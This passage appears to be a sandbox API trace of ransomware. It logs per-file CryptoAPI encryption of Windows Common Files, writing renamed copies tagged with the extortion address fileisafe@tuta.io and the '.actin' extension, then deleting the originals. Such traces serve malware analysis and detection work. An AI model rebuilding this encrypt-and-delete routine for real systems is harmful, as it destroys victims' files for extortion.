dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.982] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.982] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.983] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=10752) returned 1 [0146.983] CloseHandle (hObject=0x2f4) returned 1 [0146.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui")) returned 0x20 [0146.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\it-IT\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\it-it\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.984] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.984] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=7680) returned 1 [0146.984] CloseHandle (hObject=0x2f4) returned 1 [0146.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui")) returned 0x20 [0146.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ja-JP\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ja-jp\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.984] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.984] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0146.987] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=7680) returned 1 [0146.987] CloseHandle (hObject=0x2f4) returned 1 [0146.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui")) returned 0x20 [0146.987] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0146.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\ko-KR\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ko-kr\\tipresx.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0146.987] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0146.987] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0147.220] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=763) returned 1 [0147.220] CloseHandle (hObject=0x2e4) returned 1 [0147.220] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml")) returned 0x20 [0147.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\LanguageModel\\chstic.dgml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\languagemodel\\chstic.dgml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.221] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0147.221] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0147.222] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=370176) returned 1 [0147.222] CloseHandle (hObject=0x2e4) returned 1 [0147.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe")) returned 0x20 [0147.222] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\MSInfo\\msinfo32.exe" (normalized: "c:\\program files\\common files\\microsoft shared\\msinfo\\msinfo32.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0147.222] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0147.222] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0147.223] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=363728) returned 1 [0147.223] CloseHandle (hObject=0x2e4) returned 1 [0147.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe")) returned 0x20 [0147.223] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.223] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0147.223] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.223] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.224] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0147.224] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3370) returned 1 [0147.224] CryptSetKeyParam (hKey=0xac3370, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.224] ReadFile (in: hFile=0x2e4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x58cd0, lpOverlapped=0x0) returned 1 [0147.231] CryptEncrypt (in: hKey=0xac3370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x58ce0, dwBufLen=0x58ce0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x58ce0) returned 1 [0147.232] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x58ce0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x58ce0, lpOverlapped=0x0) returned 1 [0147.238] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0147.239] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.239] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0147.239] CryptDestroyKey (hKey=0xac33f0) returned 1 [0147.239] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0147.239] CryptDestroyKey (hKey=0xac3370) returned 1 [0147.239] CloseHandle (hObject=0x2e4) returned 1 [0147.239] CloseHandle (hObject=0x2f8) returned 1 [0147.239] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\LICLUA.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\liclua.exe")) returned 1 [0147.242] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0147.242] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0147.244] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=1475160) returned 1 [0147.244] CloseHandle (hObject=0x2f8) returned 1 [0147.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll")) returned 0x20 [0147.244] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0147.244] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.244] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.244] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0147.247] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2ff0) returned 1 [0147.247] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.247] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x110100, lpOverlapped=0x0) returned 1 [0147.476] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x110100, dwBufLen=0x110100 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x110100) returned 1 [0147.477] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x110100, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x110100, lpOverlapped=0x0) returned 1 [0147.498] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x58158, lpOverlapped=0x0) returned 1 [0147.499] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x58160, dwBufLen=0x58160 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x58160) returned 1 [0147.499] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x58160, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x58160, lpOverlapped=0x0) returned 1 [0147.505] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d30) returned 1 [0147.505] CryptSetKeyParam (hKey=0xac2d30, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.505] CryptEncrypt (in: hKey=0xac2d30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0147.505] CryptDestroyKey (hKey=0xac2d30) returned 1 [0147.505] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0147.505] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0147.505] CloseHandle (hObject=0x2f8) returned 1 [0147.505] CloseHandle (hObject=0x2e4) returned 1 [0147.506] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\OFFICE16\\Office Setup Controller\\pidgenx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\office16\\office setup controller\\pidgenx.dll")) returned 1 [0147.742] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0147.742] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.748] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=244296) returned 1 [0147.748] CloseHandle (hObject=0x2ec) returned 1 [0147.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe")) returned 0x20 [0147.748] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.748] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.748] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.748] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.749] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2e70) returned 1 [0147.749] CryptSetKeyParam (hKey=0xac2e70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.749] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x3ba48, lpOverlapped=0x0) returned 1 [0147.755] CryptEncrypt (in: hKey=0xac2e70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x3ba50, dwBufLen=0x3ba50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x3ba50) returned 1 [0147.755] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x3ba50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x3ba50, lpOverlapped=0x0) returned 1 [0147.760] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2ff0) returned 1 [0147.760] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.760] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x30, dwBufLen=0x30 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x30) returned 1 [0147.760] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0147.760] WriteFile (in: hFile=0x2f4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xe2, lpOverlapped=0x0) returned 1 [0147.760] CryptDestroyKey (hKey=0xac2e70) returned 1 [0147.760] CloseHandle (hObject=0x2ec) returned 1 [0147.760] CloseHandle (hObject=0x2f4) returned 1 [0147.760] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Source Engine\\OSE.EXE" (normalized: "c:\\program files\\common files\\microsoft shared\\source engine\\ose.exe")) returned 1 [0147.763] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0147.763] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.764] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=990032) returned 1 [0147.764] CloseHandle (hObject=0x2f4) returned 1 [0147.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll")) returned 0x20 [0147.764] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0147.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f4 [0147.764] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.764] SetFilePointerEx (in: hFile=0x2f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0147.764] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\VC\\msdia100.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\common files\\microsoft shared\\vc\\msdia100.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0147.764] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2df0) returned 1 [0147.764] CryptSetKeyParam (hKey=0xac2df0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0147.765] ReadFile (in: hFile=0x2f4, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xf1b50, lpOverlapped=0x0) returned 1 [0148.067] CryptEncrypt (in: hKey=0xac2df0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xf1b60, dwBufLen=0xf1b60 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xf1b60) returned 1 [0148.069] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf1b60, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf1b60, lpOverlapped=0x0) returned 1 [0148.085] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3130) returned 1 [0148.085] CryptSetKeyParam (hKey=0xac3130, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0148.085] CryptEncrypt (in: hKey=0xac3130, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: 